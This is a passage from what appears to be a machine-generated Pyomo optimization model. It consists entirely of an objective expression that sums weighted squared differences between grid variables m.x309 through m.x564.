8.11690209768664*m.x309)**2 + (1.3*m.x310 - 1.3*m.x309)**2) + 3.12143613076959*((8.11690209768664
*m.x337 - 8.11690209768664*m.x310)**2 + (1.3*m.x311 - 1.3*m.x310)**2) + 3.12143613076959*((
8.11690209768664*m.x338 - 8.11690209768664*m.x311)**2 + (1.3*m.x312 - 1.3*m.x311)**2) +
3.12143613076959*((8.11690209768664*m.x339 - 8.11690209768664*m.x312)**2 + (1.3*m.x313 - 1.3*
m.x312)**2) + 3.12143613076959*((8.11690209768664*m.x340 - 8.11690209768664*m.x313)**2 + (1.3*
m.x314 - 1.3*m.x313)**2) + 3.12143613076959*((8.11690209768664*m.x341 - 8.11690209768664*m.x314)
**2 + (1.3*m.x315 - 1.3*m.x314)**2) + 3.12143613076959*((8.11690209768664*m.x342 -
8.11690209768664*m.x315)**2 + (1.3*m.x316 - 1.3*m.x315)**2) + 3.12143613076959*((8.11690209768664
*m.x343 - 8.11690209768664*m.x316)**2 + (1.3*m.x317 - 1.3*m.x316)**2) + 3.12143613076959*((
8.11690209768664*m.x344 - 8.11690209768664*m.x317)**2 + (1.3*m.x318 - 1.3*m.x317)**2) +
3.12143613076959*((8.11690209768664*m.x345 - 8.11690209768664*m.x318)**2 + (1.3*m.x319 - 1.3*
m.x318)**2) + 3.12143613076959*((8.11690209768664*m.x346 - 8.11690209768664*m.x319)**2 + (1.3*
m.x320 - 1.3*m.x319)**2) + 3.12143613076959*((8.11690209768664*m.x347 - 8.11690209768664*m.x320)
**2 + (1.3*m.x321 - 1.3*m.x320)**2) + 3.12143613076959*((8.11690209768664*m.x348 -
8.11690209768664*m.x321)**2 + (1.3*m.x322 - 1.3*m.x321)**2) + 3.12143613076959*((8.11690209768664
*m.x349 - 8.11690209768664*m.x322)**2 + (1.3*m.x323 - 1.3*m.x322)**2) + 3.12143613076959*((
8.11690209768664*m.x350 - 8.11690209768664*m.x323)**2 + (1.3*m.x324 - 1.3*m.x323)**2) +
3.00951650346189*((8.11690209768664*m.x352 - 8.11690209768664*m.x325)**2 + (1.3*m.x326 - 1.3*
m.x325)**2) + 3.00951650346189*((8.11690209768664*m.x353 - 8.11690209768664*m.x326)**2 + (1.3*
m.x327 - 1.3*m.x326)**2) + 3.00951650346189*((8.11690209768664*m.x354 - 8.11690209768664*m.x327)
**2 + (1.3*m.x328 - 1.3*m.x327)**2) + 3.00951650346189*((8.11690209768664*m.x355 -
8.11690209768664*m.x328)**2 + (1.3*m.x329 - 1.3*m.x328)**2) + 3.00951650346189*((8.11690209768664
*m.x356 - 8.11690209768664*m.x329)**2 + (1.3*m.x330 - 1.3*m.x329)**2) + 3.00951650346189*((
8.11690209768664*m.x357 - 8.11690209768664*m.x330)**2 + (1.3*m.x331 - 1.3*m.x330)**2) +
3.00951650346189*((8.11690209768664*m.x358 - 8.11690209768664*m.x331)**2 + (1.3*m.x332 - 1.3*
m.x331)**2) + 3.00951650346189*((8.11690209768664*m.x359 - 8.11690209768664*m.x332)**2 + (1.3*
m.x333 - 1.3*m.x332)**2) + 3.00951650346189*((8.11690209768664*m.x360 - 8.11690209768664*m.x333)
**2 + (1.3*m.x334 - 1.3*m.x333)**2) + 3.00951650346189*((8.11690209768664*m.x361 -
8.11690209768664*m.x334)**2 + (1.3*m.x335 - 1.3*m.x334)**2) + 3.00951650346189*((8.11690209768664
*m.x362 - 8.11690209768664*m.x335)**2 + (1.3*m.x336 - 1.3*m.x335)**2) + 3.00951650346189*((
8.11690209768664*m.x363 - 8.11690209768664*m.x336)**2 + (1.3*m.x337 - 1.3*m.x336)**2) +
3.00951650346189*((8.11690209768664*m.x364 - 8.11690209768664*m.x337)**2 + (1.3*m.x338 - 1.3*
m.x337)**2) + 3.00951650346189*((8.11690209768664*m.x365 - 8.11690209768664*m.x338)**2 + (1.3*
m.x339 - 1.3*m.x338)**2) + 3.00951650346189*((8.11690209768664*m.x366 - 8.11690209768664*m.x339)
**2 + (1.3*m.x340 - 1.3*m.x339)**2) + 3.00951650346189*((8.11690209768664*m.x367 -
8.11690209768664*m.x340)**2 + (1.3*m.x341 - 1.3*m.x340)**2) + 3.00951650346189*((8.11690209768664
*m.x368 - 8.11690209768664*m.x341)**2 + (1.3*m.x342 - 1.3*m.x341)**2) + 3.00951650346189*((
8.11690209768664*m.x369 - 8.11690209768664*m.x342)**2 + (1.3*m.x343 - 1.3*m.x342)**2) +
3.00951650346189*((8.11690209768664*m.x370 - 8.11690209768664*m.x343)**2 + (1.3*m.x344 - 1.3*
m.x343)**2) + 3.00951650346189*((8.11690209768664*m.x371 - 8.11690209768664*m.x344)**2 + (1.3*
m.x345 - 1.3*m.x344)**2) + 3.00951650346189*((8.11690209768664*m.x372 - 8.11690209768664*m.x345)
**2 + (1.3*m.x346 - 1.3*m.x345)**2) + 3.00951650346189*((8.11690209768664*m.x373 -
8.11690209768664*m.x346)**2 + (1.3*m.x347 - 1.3*m.x346)**2) + 3.00951650346189*((8.11690209768664
*m.x374 - 8.11690209768664*m.x347)**2 + (1.3*m.x348 - 1.3*m.x347)**2) + 3.00951650346189*((
8.11690209768664*m.x375 - 8.11690209768664*m.x348)**2 + (1.3*m.x349 - 1.3*m.x348)**2) +
3.00951650346189*((8.11690209768664*m.x376 - 8.11690209768664*m.x349)**2 + (1.3*m.x350 - 1.3*
m.x349)**2) + 3.00951650346189*((8.11690209768664*m.x377 - 8.11690209768664*m.x350)**2 + (1.3*
m.x351 - 1.3*m.x350)**2) + 2.90015943205358*((8.11690209768664*m.x379 - 8.11690209768664*m.x352)
**2 + (1.3*m.x353 - 1.3*m.x352)**2) + 2.90015943205358*((8.11690209768664*m.x380 -
8.11690209768664*m.x353)**2 + (1.3*m.x354 - 1.3*m.x353)**2) + 2.90015943205358*((8.11690209768664
*m.x381 - 8.11690209768664*m.x354)**2 + (1.3*m.x355 - 1.3*m.x354)**2) + 2.90015943205358*((
8.11690209768664*m.x382 - 8.11690209768664*m.x355)**2 + (1.3*m.x356 - 1.3*m.x355)**2) +
2.90015943205358*((8.11690209768664*m.x383 - 8.11690209768664*m.x356)**2 + (1.3*m.x357 - 1.3*
m.x356)**2) + 2.90015943205358*((8.11690209768664*m.x384 - 8.11690209768664*m.x357)**2 + (1.3*
m.x358 - 1.3*m.x357)**2) + 2.90015943205358*((8.11690209768664*m.x385 - 8.11690209768664*m.x358)
**2 + (1.3*m.x359 - 1.3*m.x358)**2) + 2.90015943205358*((8.11690209768664*m.x386 -
8.11690209768664*m.x359)**2 + (1.3*m.x360 - 1.3*m.x359)**2) + 2.90015943205358*((8.11690209768664
*m.x387 - 8.11690209768664*m.x360)**2 + (1.3*m.x361 - 1.3*m.x360)**2) + 2.90015943205358*((
8.11690209768664*m.x388 - 8.11690209768664*m.x361)**2 + (1.3*m.x362 - 1.3*m.x361)**2) +
2.90015943205358*((8.11690209768664*m.x389 - 8.11690209768664*m.x362)**2 + (1.3*m.x363 - 1.3*
m.x362)**2) + 2.90015943205358*((8.11690209768664*m.x390 - 8.11690209768664*m.x363)**2 + (1.3*
m.x364 - 1.3*m.x363)**2) + 2.90015943205358*((8.11690209768664*m.x391 - 8.11690209768664*m.x364)
**2 + (1.3*m.x365 - 1.3*m.x364)**2) + 2.90015943205358*((8.11690209768664*m.x392 -
8.11690209768664*m.x365)**2 + (1.3*m.x366 - 1.3*m.x365)**2) + 2.90015943205358*((8.11690209768664
*m.x393 - 8.11690209768664*m.x366)**2 + (1.3*m.x367 - 1.3*m.x366)**2) + 2.90015943205358*((
8.11690209768664*m.x394 - 8.11690209768664*m.x367)**2 + (1.3*m.x368 - 1.3*m.x367)**2) +
2.90015943205358*((8.11690209768664*m.x395 - 8.11690209768664*m.x368)**2 + (1.3*m.x369 - 1.3*
m.x368)**2) + 2.90015943205358*((8.11690209768664*m.x396 - 8.11690209768664*m.x369)**2 + (1.3*
m.x370 - 1.3*m.x369)**2) + 2.90015943205358*((8.11690209768664*m.x397 - 8.11690209768664*m.x370)
**2 + (1.3*m.x371 - 1.3*m.x370)**2) + 2.90015943205358*((8.11690209768664*m.x398 -
8.11690209768664*m.x371)**2 + (1.3*m.x372 - 1.3*m.x371)**2) + 2.90015943205358*((8.11690209768664
*m.x399 - 8.11690209768664*m.x372)**2 + (1.3*m.x373 - 1.3*m.x372)**2) + 2.90015943205358*((
8.11690209768664*m.x400 - 8.11690209768664*m.x373)**2 + (1.3*m.x374 - 1.3*m.x373)**2) +
2.90015943205358*((8.11690209768664*m.x401 - 8.11690209768664*m.x374)**2 + (1.3*m.x375 - 1.3*
m.x374)**2) + 2.90015943205358*((8.11690209768664*m.x402 - 8.11690209768664*m.x375)**2 + (1.3*
m.x376 - 1.3*m.x375)**2) + 2.90015943205358*((8.11690209768664*m.x403 - 8.11690209768664*m.x376)
**2 + (1.3*m.x377 - 1.3*m.x376)**2) + 2.90015943205358*((8.11690209768664*m.x404 -
8.11690209768664*m.x377)**2 + (1.3*m.x378 - 1.3*m.x377)**2) + 2.79493946623613*((8.11690209768664
*m.x406 - 8.11690209768664*m.x379)**2 + (1.3*m.x380 - 1.3*m.x379)**2) + 2.79493946623613*((
8.11690209768664*m.x407 - 8.11690209768664*m.x380)**2 + (1.3*m.x381 - 1.3*m.x380)**2) +
2.79493946623613*((8.11690209768664*m.x408 - 8.11690209768664*m.x381)**2 + (1.3*m.x382 - 1.3*
m.x381)**2) + 2.79493946623613*((8.11690209768664*m.x409 - 8.11690209768664*m.x382)**2 + (1.3*
m.x383 - 1.3*m.x382)**2) + 2.79493946623613*((8.11690209768664*m.x410 - 8.11690209768664*m.x383)
**2 + (1.3*m.x384 - 1.3*m.x383)**2) + 2.79493946623613*((8.11690209768664*m.x411 -
8.11690209768664*m.x384)**2 + (1.3*m.x385 - 1.3*m.x384)**2) + 2.79493946623613*((8.11690209768664
*m.x412 - 8.11690209768664*m.x385)**2 + (1.3*m.x386 - 1.3*m.x385)**2) + 2.79493946623613*((
8.11690209768664*m.x413 - 8.11690209768664*m.x386)**2 + (1.3*m.x387 - 1.3*m.x386)**2) +
2.79493946623613*((8.11690209768664*m.x414 - 8.11690209768664*m.x387)**2 + (1.3*m.x388 - 1.3*
m.x387)**2) + 2.79493946623613*((8.11690209768664*m.x415 - 8.11690209768664*m.x388)**2 + (1.3*
m.x389 - 1.3*m.x388)**2) + 2.79493946623613*((8.11690209768664*m.x416 - 8.11690209768664*m.x389)
**2 + (1.3*m.x390 - 1.3*m.x389)**2) + 2.79493946623613*((8.11690209768664*m.x417 -
8.11690209768664*m.x390)**2 + (1.3*m.x391 - 1.3*m.x390)**2) + 2.79493946623613*((8.11690209768664
*m.x418 - 8.11690209768664*m.x391)**2 + (1.3*m.x392 - 1.3*m.x391)**2) + 2.79493946623613*((
8.11690209768664*m.x419 - 8.11690209768664*m.x392)**2 + (1.3*m.x393 - 1.3*m.x392)**2) +
2.79493946623613*((8.11690209768664*m.x420 - 8.11690209768664*m.x393)**2 + (1.3*m.x394 - 1.3*
m.x393)**2) + 2.79493946623613*((8.11690209768664*m.x421 - 8.11690209768664*m.x394)**2 + (1.3*
m.x395 - 1.3*m.x394)**2) + 2.79493946623613*((8.11690209768664*m.x422 - 8.11690209768664*m.x395)
**2 + (1.3*m.x396 - 1.3*m.x395)**2) + 2.79493946623613*((8.11690209768664*m.x423 -
8.11690209768664*m.x396)**2 + (1.3*m.x397 - 1.3*m.x396)**2) + 2.79493946623613*((8.11690209768664
*m.x424 - 8.11690209768664*m.x397)**2 + (1.3*m.x398 - 1.3*m.x397)**2) + 2.79493946623613*((
8.11690209768664*m.x425 - 8.11690209768664*m.x398)**2 + (1.3*m.x399 - 1.3*m.x398)**2) +
2.79493946623613*((8.11690209768664*m.x426 - 8.11690209768664*m.x399)**2 + (1.3*m.x400 - 1.3*
m.x399)**2) + 2.79493946623613*((8.11690209768664*m.x427 - 8.11690209768664*m.x400)**2 + (1.3*
m.x401 - 1.3*m.x400)**2) + 2.79493946623613*((8.11690209768664*m.x428 - 8.11690209768664*m.x401)
**2 + (1.3*m.x402 - 1.3*m.x401)**2) + 2.79493946623613*((8.11690209768664*m.x429 -
8.11690209768664*m.x402)**2 + (1.3*m.x403 - 1.3*m.x402)**2) + 2.79493946623613*((8.11690209768664
*m.x430 - 8.11690209768664*m.x403)**2 + (1.3*m.x404 - 1.3*m.x403)**2) + 2.79493946623613*((
8.11690209768664*m.x431 - 8.11690209768664*m.x404)**2 + (1.3*m.x405 - 1.3*m.x404)**2) +
2.69525336587945*((8.11690209768664*m.x433 - 8.11690209768664*m.x406)**2 + (1.3*m.x407 - 1.3*
m.x406)**2) + 2.69525336587945*((8.11690209768664*m.x434 - 8.11690209768664*m.x407)**2 + (1.3*
m.x408 - 1.3*m.x407)**2) + 2.69525336587945*((8.11690209768664*m.x435 - 8.11690209768664*m.x408)
**2 + (1.3*m.x409 - 1.3*m.x408)**2) + 2.69525336587945*((8.11690209768664*m.x436 -
8.11690209768664*m.x409)**2 + (1.3*m.x410 - 1.3*m.x409)**2) + 2.69525336587945*((8.11690209768664
*m.x437 - 8.11690209768664*m.x410)**2 + (1.3*m.x411 - 1.3*m.x410)**2) + 2.69525336587945*((
8.11690209768664*m.x438 - 8.11690209768664*m.x411)**2 + (1.3*m.x412 - 1.3*m.x411)**2) +
2.69525336587945*((8.11690209768664*m.x439 - 8.11690209768664*m.x412)**2 + (1.3*m.x413 - 1.3*
m.x412)**2) + 2.69525336587945*((8.11690209768664*m.x440 - 8.11690209768664*m.x413)**2 + (1.3*
m.x414 - 1.3*m.x413)**2) + 2.69525336587945*((8.11690209768664*m.x441 - 8.11690209768664*m.x414)
**2 + (1.3*m.x415 - 1.3*m.x414)**2) + 2.69525336587945*((8.11690209768664*m.x442 -
8.11690209768664*m.x415)**2 + (1.3*m.x416 - 1.3*m.x415)**2) + 2.69525336587945*((8.11690209768664
*m.x443 - 8.11690209768664*m.x416)**2 + (1.3*m.x417 - 1.3*m.x416)**2) + 2.69525336587945*((
8.11690209768664*m.x444 - 8.11690209768664*m.x417)**2 + (1.3*m.x418 - 1.3*m.x417)**2) +
2.69525336587945*((8.11690209768664*m.x445 - 8.11690209768664*m.x418)**2 + (1.3*m.x419 - 1.3*
m.x418)**2) + 2.69525336587945*((8.11690209768664*m.x446 - 8.11690209768664*m.x419)**2 + (1.3*
m.x420 - 1.3*m.x419)**2) + 2.69525336587945*((8.11690209768664*m.x447 - 8.11690209768664*m.x420)
**2 + (1.3*m.x421 - 1.3*m.x420)**2) + 2.69525336587945*((8.11690209768664*m.x448 -
8.11690209768664*m.x421)**2 + (1.3*m.x422 - 1.3*m.x421)**2) + 2.69525336587945*((8.11690209768664
*m.x449 - 8.11690209768664*m.x422)**2 + (1.3*m.x423 - 1.3*m.x422)**2) + 2.69525336587945*((
8.11690209768664*m.x450 - 8.11690209768664*m.x423)**2 + (1.3*m.x424 - 1.3*m.x423)**2) +
2.69525336587945*((8.11690209768664*m.x451 - 8.11690209768664*m.x424)**2 + (1.3*m.x425 - 1.3*
m.x424)**2) + 2.69525336587945*((8.11690209768664*m.x452 - 8.11690209768664*m.x425)**2 + (1.3*
m.x426 - 1.3*m.x425)**2) + 2.69525336587945*((8.11690209768664*m.x453 - 8.11690209768664*m.x426)
**2 + (1.3*m.x427 - 1.3*m.x426)**2) + 2.69525336587945*((8.11690209768664*m.x454 -
8.11690209768664*m.x427)**2 + (1.3*m.x428 - 1.3*m.x427)**2) + 2.69525336587945*((8.11690209768664
*m.x455 - 8.11690209768664*m.x428)**2 + (1.3*m.x429 - 1.3*m.x428)**2) + 2.69525336587945*((
8.11690209768664*m.x456 - 8.11690209768664*m.x429)**2 + (1.3*m.x430 - 1.3*m.x429)**2) +
2.69525336587945*((8.11690209768664*m.x457 - 8.11690209768664*m.x430)**2 + (1.3*m.x431 - 1.3*
m.x430)**2) + 2.69525336587945*((8.11690209768664*m.x458 - 8.11690209768664*m.x431)**2 + (1.3*
m.x432 - 1.3*m.x431)**2) + 2.60231300747513*((8.11690209768664*m.x460 - 8.11690209768664*m.x433)
**2 + (1.3*m.x434 - 1.3*m.x433)**2) + 2.60231300747513*((8.11690209768664*m.x461 -
8.11690209768664*m.x434)**2 + (1.3*m.x435 - 1.3*m.x434)**2) + 2.60231300747513*((8.11690209768664
*m.x462 - 8.11690209768664*m.x435)**2 + (1.3*m.x436 - 1.3*m.x435)**2) + 2.60231300747513*((
8.11690209768664*m.x463 - 8.11690209768664*m.x436)**2 + (1.3*m.x437 - 1.3*m.x436)**2) +
2.60231300747513*((8.11690209768664*m.x464 - 8.11690209768664*m.x437)**2 + (1.3*m.x438 - 1.3*
m.x437)**2) + 2.60231300747513*((8.11690209768664*m.x465 - 8.11690209768664*m.x438)**2 + (1.3*
m.x439 - 1.3*m.x438)**2) + 2.60231300747513*((8.11690209768664*m.x466 - 8.11690209768664*m.x439)
**2 + (1.3*m.x440 - 1.3*m.x439)**2) + 2.60231300747513*((8.11690209768664*m.x467 -
8.11690209768664*m.x440)**2 + (1.3*m.x441 - 1.3*m.x440)**2) + 2.60231300747513*((8.11690209768664
*m.x468 - 8.11690209768664*m.x441)**2 + (1.3*m.x442 - 1.3*m.x441)**2) + 2.60231300747513*((
8.11690209768664*m.x469 - 8.11690209768664*m.x442)**2 + (1.3*m.x443 - 1.3*m.x442)**2) +
2.60231300747513*((8.11690209768664*m.x470 - 8.11690209768664*m.x443)**2 + (1.3*m.x444 - 1.3*
m.x443)**2) + 2.60231300747513*((8.11690209768664*m.x471 - 8.11690209768664*m.x444)**2 + (1.3*
m.x445 - 1.3*m.x444)**2) + 2.60231300747513*((8.11690209768664*m.x472 - 8.11690209768664*m.x445)
**2 + (1.3*m.x446 - 1.3*m.x445)**2) + 2.60231300747513*((8.11690209768664*m.x473 -
8.11690209768664*m.x446)**2 + (1.3*m.x447 - 1.3*m.x446)**2) + 2.60231300747513*((8.11690209768664
*m.x474 - 8.11690209768664*m.x447)**2 + (1.3*m.x448 - 1.3*m.x447)**2) + 2.60231300747513*((
8.11690209768664*m.x475 - 8.11690209768664*m.x448)**2 + (1.3*m.x449 - 1.3*m.x448)**2) +
2.60231300747513*((8.11690209768664*m.x476 - 8.11690209768664*m.x449)**2 + (1.3*m.x450 - 1.3*
m.x449)**2) + 2.60231300747513*((8.11690209768664*m.x477 - 8.11690209768664*m.x450)**2 + (1.3*
m.x451 - 1.3*m.x450)**2) + 2.60231300747513*((8.11690209768664*m.x478 - 8.11690209768664*m.x451)
**2 + (1.3*m.x452 - 1.3*m.x451)**2) + 2.60231300747513*((8.11690209768664*m.x479 -
8.11690209768664*m.x452)**2 + (1.3*m.x453 - 1.3*m.x452)**2) + 2.60231300747513*((8.11690209768664
*m.x480 - 8.11690209768664*m.x453)**2 + (1.3*m.x454 - 1.3*m.x453)**2) + 2.60231300747513*((
8.11690209768664*m.x481 - 8.11690209768664*m.x454)**2 + (1.3*m.x455 - 1.3*m.x454)**2) +
2.60231300747513*((8.11690209768664*m.x482 - 8.11690209768664*m.x455)**2 + (1.3*m.x456 - 1.3*
m.x455)**2) + 2.60231300747513*((8.11690209768664*m.x483 - 8.11690209768664*m.x456)**2 + (1.3*
m.x457 - 1.3*m.x456)**2) + 2.60231300747513*((8.11690209768664*m.x484 - 8.11690209768664*m.x457)
**2 + (1.3*m.x458 - 1.3*m.x457)**2) + 2.60231300747513*((8.11690209768664*m.x485 -
8.11690209768664*m.x458)**2 + (1.3*m.x459 - 1.3*m.x458)**2) + 2.51714661263041*((8.11690209768664
*m.x487 - 8.11690209768664*m.x460)**2 + (1.3*m.x461 - 1.3*m.x460)**2) + 2.51714661263041*((
8.11690209768664*m.x488 - 8.11690209768664*m.x461)**2 + (1.3*m.x462 - 1.3*m.x461)**2) +
2.51714661263041*((8.11690209768664*m.x489 - 8.11690209768664*m.x462)**2 + (1.3*m.x463 - 1.3*
m.x462)**2) + 2.51714661263041*((8.11690209768664*m.x490 - 8.11690209768664*m.x463)**2 + (1.3*
m.x464 - 1.3*m.x463)**2) + 2.51714661263041*((8.11690209768664*m.x491 - 8.11690209768664*m.x464)
**2 + (1.3*m.x465 - 1.3*m.x464)**2) + 2.51714661263041*((8.11690209768664*m.x492 -
8.11690209768664*m.x465)**2 + (1.3*m.x466 - 1.3*m.x465)**2) + 2.51714661263041*((8.11690209768664
*m.x493 - 8.11690209768664*m.x466)**2 + (1.3*m.x467 - 1.3*m.x466)**2) + 2.51714661263041*((
8.11690209768664*m.x494 - 8.11690209768664*m.x467)**2 + (1.3*m.x468 - 1.3*m.x467)**2) +
2.51714661263041*((8.11690209768664*m.x495 - 8.11690209768664*m.x468)**2 + (1.3*m.x469 - 1.3*
m.x468)**2) + 2.51714661263041*((8.11690209768664*m.x496 - 8.11690209768664*m.x469)**2 + (1.3*
m.x470 - 1.3*m.x469)**2) + 2.51714661263041*((8.11690209768664*m.x497 - 8.11690209768664*m.x470)
**2 + (1.3*m.x471 - 1.3*m.x470)**2) + 2.51714661263041*((8.11690209768664*m.x498 -
8.11690209768664*m.x471)**2 + (1.3*m.x472 - 1.3*m.x471)**2) + 2.51714661263041*((8.11690209768664
*m.x499 - 8.11690209768664*m.x472)**2 + (1.3*m.x473 - 1.3*m.x472)**2) + 2.51714661263041*((
8.11690209768664*m.x500 - 8.11690209768664*m.x473)**2 + (1.3*m.x474 - 1.3*m.x473)**2) +
2.51714661263041*((8.11690209768664*m.x501 - 8.11690209768664*m.x474)**2 + (1.3*m.x475 - 1.3*
m.x474)**2) + 2.51714661263041*((8.11690209768664*m.x502 - 8.11690209768664*m.x475)**2 + (1.3*
m.x476 - 1.3*m.x475)**2) + 2.51714661263041*((8.11690209768664*m.x503 - 8.11690209768664*m.x476)
**2 + (1.3*m.x477 - 1.3*m.x476)**2) + 2.51714661263041*((8.11690209768664*m.x504 -
8.11690209768664*m.x477)**2 + (1.3*m.x478 - 1.3*m.x477)**2) + 2.51714661263041*((8.11690209768664
*m.x505 - 8.11690209768664*m.x478)**2 + (1.3*m.x479 - 1.3*m.x478)**2) + 2.51714661263041*((
8.11690209768664*m.x506 - 8.11690209768664*m.x479)**2 + (1.3*m.x480 - 1.3*m.x479)**2) +
2.51714661263041*((8.11690209768664*m.x507 - 8.11690209768664*m.x480)**2 + (1.3*m.x481 - 1.3*
m.x480)**2) + 2.51714661263041*((8.11690209768664*m.x508 - 8.11690209768664*m.x481)**2 + (1.3*
m.x482 - 1.3*m.x481)**2) + 2.51714661263041*((8.11690209768664*m.x509 - 8.11690209768664*m.x482)
**2 + (1.3*m.x483 - 1.3*m.x482)**2) + 2.51714661263041*((8.11690209768664*m.x510 -
8.11690209768664*m.x483)**2 + (1.3*m.x484 - 1.3*m.x483)**2) + 2.51714661263041*((8.11690209768664
*m.x511 - 8.11690209768664*m.x484)**2 + (1.3*m.x485 - 1.3*m.x484)**2) + 2.51714661263041*((
8.11690209768664*m.x512 - 8.11690209768664*m.x485)**2 + (1.3*m.x486 - 1.3*m.x485)**2) +
2.44060689052043*((8.11690209768664*m.x514 - 8.11690209768664*m.x487)**2 + (1.3*m.x488 - 1.3*
m.x487)**2) + 2.44060689052043*((8.11690209768664*m.x515 - 8.11690209768664*m.x488)**2 + (1.3*
m.x489 - 1.3*m.x488)**2) + 2.44060689052043*((8.11690209768664*m.x516 - 8.11690209768664*m.x489)
**2 + (1.3*m.x490 - 1.3*m.x489)**2) + 2.44060689052043*((8.11690209768664*m.x517 -
8.11690209768664*m.x490)**2 + (1.3*m.x491 - 1.3*m.x490)**2) + 2.44060689052043*((8.11690209768664
*m.x518 - 8.11690209768664*m.x491)**2 + (1.3*m.x492 - 1.3*m.x491)**2) + 2.44060689052043*((
8.11690209768664*m.x519 - 8.11690209768664*m.x492)**2 + (1.3*m.x493 - 1.3*m.x492)**2) +
2.44060689052043*((8.11690209768664*m.x520 - 8.11690209768664*m.x493)**2 + (1.3*m.x494 - 1.3*
m.x493)**2) + 2.44060689052043*((8.11690209768664*m.x521 - 8.11690209768664*m.x494)**2 + (1.3*
m.x495 - 1.3*m.x494)**2) + 2.44060689052043*((8.11690209768664*m.x522 - 8.11690209768664*m.x495)
**2 + (1.3*m.x496 - 1.3*m.x495)**2) + 2.44060689052043*((8.11690209768664*m.x523 -
8.11690209768664*m.x496)**2 + (1.3*m.x497 - 1.3*m.x496)**2) + 2.44060689052043*((8.11690209768664
*m.x524 - 8.11690209768664*m.x497)**2 + (1.3*m.x498 - 1.3*m.x497)**2) + 2.44060689052043*((
8.11690209768664*m.x525 - 8.11690209768664*m.x498)**2 + (1.3*m.x499 - 1.3*m.x498)**2) +
2.44060689052043*((8.11690209768664*m.x526 - 8.11690209768664*m.x499)**2 + (1.3*m.x500 - 1.3*
m.x499)**2) + 2.44060689052043*((8.11690209768664*m.x527 - 8.11690209768664*m.x500)**2 + (1.3*
m.x501 - 1.3*m.x500)**2) + 2.44060689052043*((8.11690209768664*m.x528 - 8.11690209768664*m.x501)
**2 + (1.3*m.x502 - 1.3*m.x501)**2) + 2.44060689052043*((8.11690209768664*m.x529 -
8.11690209768664*m.x502)**2 + (1.3*m.x503 - 1.3*m.x502)**2) + 2.44060689052043*((8.11690209768664
*m.x530 - 8.11690209768664*m.x503)**2 + (1.3*m.x504 - 1.3*m.x503)**2) + 2.44060689052043*((
8.11690209768664*m.x531 - 8.11690209768664*m.x504)**2 + (1.3*m.x505 - 1.3*m.x504)**2) +
2.44060689052043*((8.11690209768664*m.x532 - 8.11690209768664*m.x505)**2 + (1.3*m.x506 - 1.3*
m.x505)**2) + 2.44060689052043*((8.11690209768664*m.x533 - 8.11690209768664*m.x506)**2 + (1.3*
m.x507 - 1.3*m.x506)**2) + 2.44060689052043*((8.11690209768664*m.x534 - 8.11690209768664*m.x507)
**2 + (1.3*m.x508 - 1.3*m.x507)**2) + 2.44060689052043*((8.11690209768664*m.x535 -
8.11690209768664*m.x508)**2 + (1.3*m.x509 - 1.3*m.x508)**2) + 2.44060689052043*((8.11690209768664
*m.x536 - 8.11690209768664*m.x509)**2 + (1.3*m.x510 - 1.3*m.x509)**2) + 2.44060689052043*((
8.11690209768664*m.x537 - 8.11690209768664*m.x510)**2 + (1.3*m.x511 - 1.3*m.x510)**2) +
2.44060689052043*((8.11690209768664*m.x538 - 8.11690209768664*m.x511)**2 + (1.3*m.x512 - 1.3*
m.x511)**2) + 2.44060689052043*((8.11690209768664*m.x539 - 8.11690209768664*m.x512)**2 + (1.3*
m.x513 - 1.3*m.x512)**2) + 2.3733844381995*((8.11690209768664*m.x541 - 8.11690209768664*m.x514)**
2 + (1.3*m.x515 - 1.3*m.x514)**2) + 2.3733844381995*((8.11690209768664*m.x542 - 8.11690209768664*
m.x515)**2 + (1.3*m.x516 - 1.3*m.x515)**2) + 2.3733844381995*((8.11690209768664*m.x543 -
8.11690209768664*m.x516)**2 + (1.3*m.x517 - 1.3*m.x516)**2) + 2.3733844381995*((8.11690209768664*
m.x544 - 8.11690209768664*m.x517)**2 + (1.3*m.x518 - 1.3*m.x517)**2) + 2.3733844381995*((
8.11690209768664*m.x545 - 8.11690209768664*m.x518)**2 + (1.3*m.x519 - 1.3*m.x518)**2) +
2.3733844381995*((8.11690209768664*m.x546 - 8.11690209768664*m.x519)**2 + (1.3*m.x520 - 1.3*
m.x519)**2) + 2.3733844381995*((8.11690209768664*m.x547 - 8.11690209768664*m.x520)**2 + (1.3*
m.x521 - 1.3*m.x520)**2) + 2.3733844381995*((8.11690209768664*m.x548 - 8.11690209768664*m.x521)**
2 + (1.3*m.x522 - 1.3*m.x521)**2) + 2.3733844381995*((8.11690209768664*m.x549 - 8.11690209768664*
m.x522)**2 + (1.3*m.x523 - 1.3*m.x522)**2) + 2.3733844381995*((8.11690209768664*m.x550 -
8.11690209768664*m.x523)**2 + (1.3*m.x524 - 1.3*m.x523)**2) + 2.3733844381995*((8.11690209768664*
m.x551 - 8.11690209768664*m.x524)**2 + (1.3*m.x525 - 1.3*m.x524)**2) + 2.3733844381995*((
8.11690209768664*m.x552 - 8.11690209768664*m.x525)**2 + (1.3*m.x526 - 1.3*m.x525)**2) +
2.3733844381995*((8.11690209768664*m.x553 - 8.11690209768664*m.x526)**2 + (1.3*m.x527 - 1.3*
m.x526)**2) + 2.3733844381995*((8.11690209768664*m.x554 - 8.11690209768664*m.x527)**2 + (1.3*
m.x528 - 1.3*m.x527)**2) + 2.3733844381995*((8.11690209768664*m.x555 - 8.11690209768664*m.x528)**
2 + (1.3*m.x529 - 1.3*m.x528)**2) + 2.3733844381995*((8.11690209768664*m.x556 - 8.11690209768664*
m.x529)**2 + (1.3*m.x530 - 1.3*m.x529)**2) + 2.3733844381995*((8.11690209768664*m.x557 -
8.11690209768664*m.x530)**2 + (1.3*m.x531 - 1.3*m.x530)**2) + 2.3733844381995*((8.11690209768664*
m.x558 - 8.11690209768664*m.x531)**2 + (1.3*m.x532 - 1.3*m.x531)**2) + 2.3733844381995*((
8.11690209768664*m.x559 - 8.11690209768664*m.x532)**2 + (1.3*m.x533 - 1.3*m.x532)**2) +
2.3733844381995*((8.11690209768664*m.x560 - 8.11690209768664*m.x533)**2 + (1.3*m.x534 - 1.3*
m.x533)**2) + 2.3733844381995*((8.11690209768664*m.x561 - 8.11690209768664*m.x534)**2 + (1.3*
m.x535 - 1.3*m.x534)**2) + 2.3733844381995*((8.11690209768664*m.x562 - 8.11690209768664*m.x535)**
2 + (1.3*m.x536 - 1.3*m.x535)**2) + 2.3733844381995*((8.11690209768664*m.x563 - 8.11690209768664*
m.x536)**2 + (1.3*m.x537 - 1.3*m.x536)**2) + 2.3733844381995*((8.11690209768664*m.x564 -
8.11690209768664*m.x537)**2 + (1.3*m.x538 - 1.3*m.x537)**2) + 2.3733844381995*((8.11690209768664*
